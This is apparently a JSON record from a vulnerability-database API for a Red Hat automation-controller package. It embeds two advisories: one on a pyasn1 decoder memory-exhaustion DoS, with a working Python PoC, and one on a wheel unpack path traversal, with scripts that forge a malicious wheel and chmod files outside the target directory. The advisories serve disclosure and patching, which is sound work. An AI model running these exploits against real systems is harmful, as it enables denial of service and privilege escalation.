Package Instance
Lookup for vulnerable packages by Package URL.
GET /api/packages/87295?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/87295?format=api", "purl": "pkg:rpm/redhat/automation-controller@4.6.26-1?arch=el9ap", "type": "rpm", "namespace": "redhat", "name": "automation-controller", "version": "4.6.26-1", "qualifiers": { "arch": "el9ap" }, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": null, "latest_non_vulnerable_version": null, "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/20254?format=api", "vulnerability_id": "VCID-bptp-5gn6-eucd", "summary": "pyasn1 has a DoS vulnerability in decoder\n### Summary\n\nAfter reviewing pyasn1 v0.6.1 a Denial-of-Service issue has been found that leads to memory exhaustion from malformed RELATIVE-OID with excessive continuation octets.\n\n### Details\n\nThe integer issue can be found in the decoder as `reloid += ((subId << 7) + nextSubId,)`: https://github.com/pyasn1/pyasn1/blob/main/pyasn1/codec/ber/decoder.py#L496\n\n### PoC\n\nFor the DoS:\n```py\nimport pyasn1.codec.ber.decoder as decoder\nimport pyasn1.type.univ as univ\nimport sys\nimport resource\n\n# Deliberately set memory limit to display PoC\ntry:\n resource.setrlimit(resource.RLIMIT_AS, (100*1024*1024, 100*1024*1024))\n print(\"[*] Memory limit set to 100MB\")\nexcept:\n print(\"[-] Could not set memory limit\")\n\n# Test with different payload sizes to find the DoS threshold\npayload_size_mb = int(sys.argv[1])\n\nprint(f\"[*] Testing with {payload_size_mb}MB payload...\")\n\npayload_size = payload_size_mb * 1024 * 1024\n# Create payload with continuation octets\n# Each 0x81 byte indicates continuation, causing bit shifting in decoder\npayload = b'\\x81' * payload_size + b'\\x00'\nlength = len(payload)\n\n# DER length encoding (supports up to 4GB)\nif length < 128:\n length_bytes = bytes([length])\nelif length < 256:\n length_bytes = b'\\x81' + length.to_bytes(1, 'big')\nelif length < 256**2:\n length_bytes = b'\\x82' + length.to_bytes(2, 'big')\nelif length < 256**3:\n length_bytes = b'\\x83' + length.to_bytes(3, 'big')\nelse:\n # 4 bytes can handle up to 4GB\n length_bytes = b'\\x84' + length.to_bytes(4, 'big')\n\n# Use OID (0x06) for more aggressive parsing\nmalicious_packet = b'\\x06' + length_bytes + payload\n\nprint(f\"[*] Packet size: {len(malicious_packet) / 1024 / 1024:.1f} MB\")\n\ntry:\n print(\"[*] Decoding (this may take time or exhaust memory)...\")\n result = decoder.decode(malicious_packet, asn1Spec=univ.ObjectIdentifier())\n\n print(f'[+] Decoded successfully')\n print(f'[!] Object size: {sys.getsizeof(result[0])} bytes')\n\n # Try to convert to string\n print('[*] Converting to string...')\n try:\n str_result = str(result[0])\n print(f'[+] String succeeded: {len(str_result)} chars')\n if len(str_result) > 10000:\n print(f'[!] MEMORY EXPLOSION: {len(str_result)} character string!')\n except MemoryError:\n print(f'[-] MemoryError during string conversion!')\n except Exception as e:\n print(f'[-] {type(e).__name__} during string conversion')\n\nexcept MemoryError:\n print('[-] MemoryError: Out of memory!')\nexcept Exception as e:\n print(f'[-] Error: {type(e).__name__}: {e}')\n\n\nprint(\"\\n[*] Test completed\")\n```\n\n\nScreenshots with the results:\n\n#### DoS\n<img width=\"944\" height=\"207\" alt=\"Screenshot_20251219_160840\" src=\"https://github.com/user-attachments/assets/68b9566b-5ee1-47b0-a269-605b037dfc4f\" />\n\n<img width=\"931\" height=\"231\" alt=\"Screenshot_20251219_152815\" src=\"https://github.com/user-attachments/assets/62eacf4f-eb31-4fba-b7a8-e8151484a9fa\" />\n\n#### Leak analysis\n\nA potential heap leak was investigated but came back clean:\n```\n[*] Creating 1000KB payload...\n[*] Decoding with pyasn1...\n[*] Materializing to string...\n[+] Decoded 2157784 characters\n[+] Binary representation: 896001 bytes\n[+] Dumped to heap_dump.bin\n\n[*] First 64 bytes (hex):\n 01020408102040810204081020408102040810204081020408102040810204081020408102040810204081020408102040810204081020408102040810204081\n\n[*] First 64 bytes (ASCII/hex dump):\n 0000: 01 02 04 08 10 20 40 81 02 04 08 10 20 40 81 02 ..... @..... @..\n 0010: 04 08 10 20 40 81 02 04 08 10 20 40 81 02 04 08 ... @..... @....\n 0020: 10 20 40 81 02 04 08 10 20 40 81 02 04 08 10 20 . @..... @..... \n 0030: 40 81 02 04 08 10 20 40 81 02 04 08 10 20 40 81 @..... @..... @.\n\n[*] Digit distribution analysis:\n '0': 10.1%\n '1': 9.9%\n '2': 10.0%\n '3': 9.9%\n '4': 9.9%\n '5': 10.0%\n '6': 10.0%\n '7': 10.0%\n '8': 9.9%\n '9': 10.1%\n```\n\n### Scenario\n\n1. An attacker creates a malicious X.509 certificate.\n2. The application validates certificates.\n3. The application accepts the malicious certificate and tries decoding resulting in the issues mentioned above.\n\n### Impact\n\nThis issue can affect resource consumption and hang systems or stop services.\nThis may affect:\n- LDAP servers\n- TLS/SSL endpoints\n- OCSP responders\n- etc.\n\n### Recommendation\n\nAdd a limit to the allowed bytes in the decoder.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-23490.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-23490.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-23490", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05876", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05866", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05829", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05797", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05649", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05637", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05682", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05688", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05696", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05716", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.0569", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05652", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05659", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05618", "published_at": "2026-04-02T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-23490" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-23490", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-23490" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/pyasn1/pyasn1", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyasn1/pyasn1" }, { "reference_url": "https://github.com/pyasn1/pyasn1/blob/0f07d7242a78ab4d129b26256d7474f7168cf536/pyasn1/codec/ber/decoder.py#L496", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyasn1/pyasn1/blob/0f07d7242a78ab4d129b26256d7474f7168cf536/pyasn1/codec/ber/decoder.py#L496" }, { "reference_url": "https://github.com/pyasn1/pyasn1/commit/3908f144229eed4df24bd569d16e5991ace44970", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-01-16T19:23:28Z/" } ], "url": "https://github.com/pyasn1/pyasn1/commit/3908f144229eed4df24bd569d16e5991ace44970" }, { "reference_url": "https://github.com/pyasn1/pyasn1/commit/be353d755f42ea36539b4f5053c652ddf56979a6", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyasn1/pyasn1/commit/be353d755f42ea36539b4f5053c652ddf56979a6" }, { "reference_url": "https://github.com/pyasn1/pyasn1/releases/tag/v0.6.2", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-01-16T19:23:28Z/" } ], "url": "https://github.com/pyasn1/pyasn1/releases/tag/v0.6.2" }, { "reference_url": "https://github.com/pyasn1/pyasn1/security/advisories/GHSA-63vm-454h-vhhq", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-01-16T19:23:28Z/" } ], "url": "https://github.com/pyasn1/pyasn1/security/advisories/GHSA-63vm-454h-vhhq" }, { "reference_url": "https://lists.debian.org/debian-lts-announce/2026/02/msg00002.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://lists.debian.org/debian-lts-announce/2026/02/msg00002.html" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23490", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23490" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1125753", "reference_id": "1125753", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1125753" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430472", "reference_id": "2430472", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430472" }, { "reference_url": "https://github.com/advisories/GHSA-63vm-454h-vhhq", "reference_id": "GHSA-63vm-454h-vhhq", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-63vm-454h-vhhq" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:1903", "reference_id": "RHSA-2026:1903", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:1903" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:1904", "reference_id": "RHSA-2026:1904", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:1904" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:1905", "reference_id": "RHSA-2026:1905", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:1905" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:1906", "reference_id": "RHSA-2026:1906", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:1906" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2221", "reference_id": "RHSA-2026:2221", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2221" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2299", "reference_id": "RHSA-2026:2299", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2299" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2300", "reference_id": "RHSA-2026:2300", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2300" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2302", "reference_id": "RHSA-2026:2302", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2302" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2303", "reference_id": "RHSA-2026:2303", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2303" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2309", "reference_id": "RHSA-2026:2309", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2309" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2453", "reference_id": "RHSA-2026:2453", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2453" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2460", "reference_id": "RHSA-2026:2460", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2460" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2483", "reference_id": "RHSA-2026:2483", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2483" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2486", "reference_id": "RHSA-2026:2486", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2486" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2712", "reference_id": "RHSA-2026:2712", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2712" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2758", "reference_id": "RHSA-2026:2758", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2758" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:3354", "reference_id": "RHSA-2026:3354", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:3354" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:3359", "reference_id": "RHSA-2026:3359", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:3359" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:3958", "reference_id": "RHSA-2026:3958", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:3958" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:3959", "reference_id": "RHSA-2026:3959", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:3959" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:4138", "reference_id": "RHSA-2026:4138", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:4138" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:4139", "reference_id": "RHSA-2026:4139", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:4139" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:4140", "reference_id": "RHSA-2026:4140", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:4140" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:4141", "reference_id": "RHSA-2026:4141", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:4141" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:4142", "reference_id": "RHSA-2026:4142", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:4142" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:4143", "reference_id": "RHSA-2026:4143", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:4143" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:4144", "reference_id": "RHSA-2026:4144", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:4144" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:4145", "reference_id": "RHSA-2026:4145", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:4145" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:4146", "reference_id": "RHSA-2026:4146", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:4146" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:4147", "reference_id": "RHSA-2026:4147", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:4147" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:4148", "reference_id": "RHSA-2026:4148", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:4148" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:4943", "reference_id": "RHSA-2026:4943", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:4943" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:5606", "reference_id": "RHSA-2026:5606", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:5606" }, { "reference_url": "https://usn.ubuntu.com/7975-1/", "reference_id": "USN-7975-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7975-1/" }, { "reference_url": "https://usn.ubuntu.com/8134-1/", "reference_id": "USN-8134-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/8134-1/" } ], "fixed_packages": [], "aliases": [ "CVE-2026-23490", "GHSA-63vm-454h-vhhq" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-bptp-5gn6-eucd" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/20550?format=api", "vulnerability_id": "VCID-fm8w-bycx-4yex", "summary": "Wheel Affected by Arbitrary File Permission Modification via Path Traversal in wheel unpack\n### Summary\n - **Vulnerability Type:** Path Traversal (CWE-22) leading to Arbitrary File Permission Modification. \n - **Root Cause Component:** wheel.cli.unpack.unpack function. \n - **Affected Packages:** \n 1. wheel (Upstream source) \n 2. setuptools (Downstream, vendors wheel) \n - **Severity:** High (Allows modifying system file permissions). \n\n### Details \nThe vulnerability exists in how the unpack function handles file permissions after extraction. The code blindly trusts the filename from the archive header for the chmod operation, even though the extraction process itself might have sanitized the path. \n```\n# Vulnerable Code Snippet (present in both wheel and setuptools/_vendor/wheel)\nfor zinfo in wf.filelist:\n wf.extract(zinfo, destination) # (1) Extraction is handled safely by zipfile\n\n # (2) VULNERABILITY:\n # The 'permissions' are applied to a path constructed using the UNSANITIZED 'zinfo.filename'.\n # If zinfo.filename contains \"../\", this targets files outside the destination.\n permissions = zinfo.external_attr >> 16 & 0o777\n destination.joinpath(zinfo.filename).chmod(permissions)\n``` \n\n### PoC \nI have confirmed this exploit works against the unpack function imported from setuptools._vendor.wheel.cli.unpack. \n\n**Prerequisites:** pip install setuptools \n\n**Step 1: Generate the Malicious Wheel (gen_poc.py)** \nThis script creates a wheel that passes internal hash validation but contains a directory traversal payload in the file list. \n```\nimport zipfile\nimport hashlib\nimport base64\nimport os\n\ndef urlsafe_b64encode(data):\n \"\"\"\n Helper function to encode data using URL-safe Base64 without padding.\n Required by the Wheel file format specification.\n \"\"\"\n return base64.urlsafe_b64encode(data).rstrip(b'=').decode('ascii')\n\ndef get_hash_and_size(data_bytes):\n \"\"\"\n Calculates SHA-256 hash and size of the data.\n These values are required to construct a valid 'RECORD' file,\n which is used by the 'wheel' library to verify integrity.\n \"\"\"\n digest = hashlib.sha256(data_bytes).digest()\n hash_str = \"sha256=\" + urlsafe_b64encode(digest)\n return hash_str, str(len(data_bytes))\n\ndef create_evil_wheel_v4(filename=\"evil-1.0-py3-none-any.whl\"):\n print(f\"[Generator V4] Creating 'Authenticated' Malicious Wheel: {filename}\")\n\n # 1. Prepare Standard Metadata Content\n # These are minimal required contents to make the wheel look legitimate.\n wheel_content = b\"Wheel-Version: 1.0\\nGenerator: bdist_wheel (0.37.1)\\nRoot-Is-Purelib: true\\nTag: py3-none-any\\n\"\n metadata_content = b\"Metadata-Version: 2.1\\nName: evil\\nVersion: 1.0\\nSummary: PoC Package\\n\"\n \n # 2. Define Malicious Payload (Path Traversal)\n # The content doesn't matter, but the path does.\n payload_content = b\"PWNED by Path Traversal\"\n\n # [ATTACK VECTOR]: Target a file OUTSIDE the extraction directory using '../'\n # The vulnerability allows 'chmod' to affect this path directly.\n malicious_path = \"../../poc_target.txt\"\n\n # 3. Calculate Hashes for Integrity Check Bypass\n # The 'wheel' library verifies if the file hash matches the RECORD entry.\n # To bypass this check, we calculate the correct hash for our malicious file.\n wheel_hash, wheel_size = get_hash_and_size(wheel_content)\n metadata_hash, metadata_size = get_hash_and_size(metadata_content)\n payload_hash, payload_size = get_hash_and_size(payload_content)\n\n # 4. Construct the 'RECORD' File\n # The RECORD file lists all files in the wheel with their hashes.\n # CRITICAL: We explicitly register the malicious path ('../../poc_target.txt') here.\n # This tricks the 'wheel' library into treating the malicious file as a valid, verified component.\n record_lines = [\n f\"evil-1.0.dist-info/WHEEL,{wheel_hash},{wheel_size}\",\n f\"evil-1.0.dist-info/METADATA,{metadata_hash},{metadata_size}\",\n f\"{malicious_path},{payload_hash},{payload_size}\", # <-- Authenticating the malicious path\n \"evil-1.0.dist-info/RECORD,,\"\n ]\n record_content = \"\\n\".join(record_lines).encode('utf-8')\n\n # 5. Build the Zip File\n with zipfile.ZipFile(filename, \"w\") as zf:\n # Write standard metadata files\n zf.writestr(\"evil-1.0.dist-info/WHEEL\", wheel_content)\n zf.writestr(\"evil-1.0.dist-info/METADATA\", metadata_content)\n zf.writestr(\"evil-1.0.dist-info/RECORD\", record_content)\n\n # [EXPLOIT CORE]: Manually craft ZipInfo for the malicious file\n # We need to set specific permission bits to trigger the vulnerability.\n zinfo = zipfile.ZipInfo(malicious_path)\n \n # Set external attributes to 0o777 (rwxrwxrwx)\n # Upper 16 bits: File type (0o100000 = Regular File)\n # Lower 16 bits: Permissions (0o777 = World Writable)\n # The vulnerable 'unpack' function will blindly apply this '777' to the system file.\n zinfo.external_attr = (0o100000 | 0o777) << 16\n \n zf.writestr(zinfo, payload_content)\n\n print(\"[Generator V4] Done. Malicious file added to RECORD and validation checks should pass.\")\n\nif __name__ == \"__main__\":\n create_evil_wheel_v4()\n``` \n\n**Step 2: Run the Exploit (exploit.py)** \n```\nfrom pathlib import Path\nimport sys\n\n# Demonstrating impact on setuptools\ntry:\n from setuptools._vendor.wheel.cli.unpack import unpack\n print(\"[*] Loaded unpack from setuptools\")\nexcept ImportError:\n from wheel.cli.unpack import unpack\n print(\"[*] Loaded unpack from wheel\")\n\n# 1. Setup Target (Read-Only system file simulation)\ntarget = Path(\"poc_target.txt\")\ntarget.write_text(\"SENSITIVE CONFIG\")\ntarget.chmod(0o400) # Read-only\nprint(f\"[*] Initial Perms: {oct(target.stat().st_mode)[-3:]}\")\n\n# 2. Run Vulnerable Unpack\n# The wheel contains \"../../poc_target.txt\".\n# unpack() will extract safely, BUT chmod() will hit the actual target file.\ntry:\n unpack(\"evil-1.0-py3-none-any.whl\", \"unpack_dest\")\nexcept Exception as e:\n print(f\"[!] Ignored expected extraction error: {e}\")\n\n# 3. Check Result\nfinal_perms = oct(target.stat().st_mode)[-3:]\nprint(f\"[*] Final Perms: {final_perms}\")\n\nif final_perms == \"777\":\n print(\"VULNERABILITY CONFIRMED: Target file is now world-writable (777)!\")\nelse:\n print(\"[-] Attack failed.\")\n``` \n\n**result:** \n<img width=\"806\" height=\"838\" alt=\"image\" src=\"https://github.com/user-attachments/assets/f750eb3b-36ea-445c-b7f4-15c14eb188db\" /> \n \n### Impact \nAttackers can craft a malicious wheel file that, when unpacked, changes the permissions of critical system files (e.g., /etc/passwd, SSH keys, config files) to 777. This allows for Privilege Escalation or arbitrary code execution by modifying now-writable scripts. \n\n### Recommended Fix \nThe unpack function must not use zinfo.filename for post-extraction operations. It should use the sanitized path returned by wf.extract(). \n\n### Suggested Patch: \n```\n# extract() returns the actual path where the file was written\nextracted_path = wf.extract(zinfo, destination)\n\n# Only apply chmod if a file was actually written\nif extracted_path:\n permissions = zinfo.external_attr >> 16 & 0o777\n Path(extracted_path).chmod(permissions)\n```", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-24049.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-24049.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-24049", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.01973", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.01905", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.01918", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.01917", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.01919", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.01933", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.01901", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.01896", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.01877", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.01875", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.01961", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.01948", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.01943", "published_at": "2026-04-26T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-24049" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/pypa/wheel", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pypa/wheel" }, { "reference_url": "https://github.com/pypa/wheel/commit/7a7d2de96b22a9adf9208afcc9547e1001569fef", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-22T12:24:28Z/" } ], "url": "https://github.com/pypa/wheel/commit/7a7d2de96b22a9adf9208afcc9547e1001569fef" }, { "reference_url": "https://github.com/pypa/wheel/commit/934fe177ff912c8e03d5ae951d3805e1fd90ba5e", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": 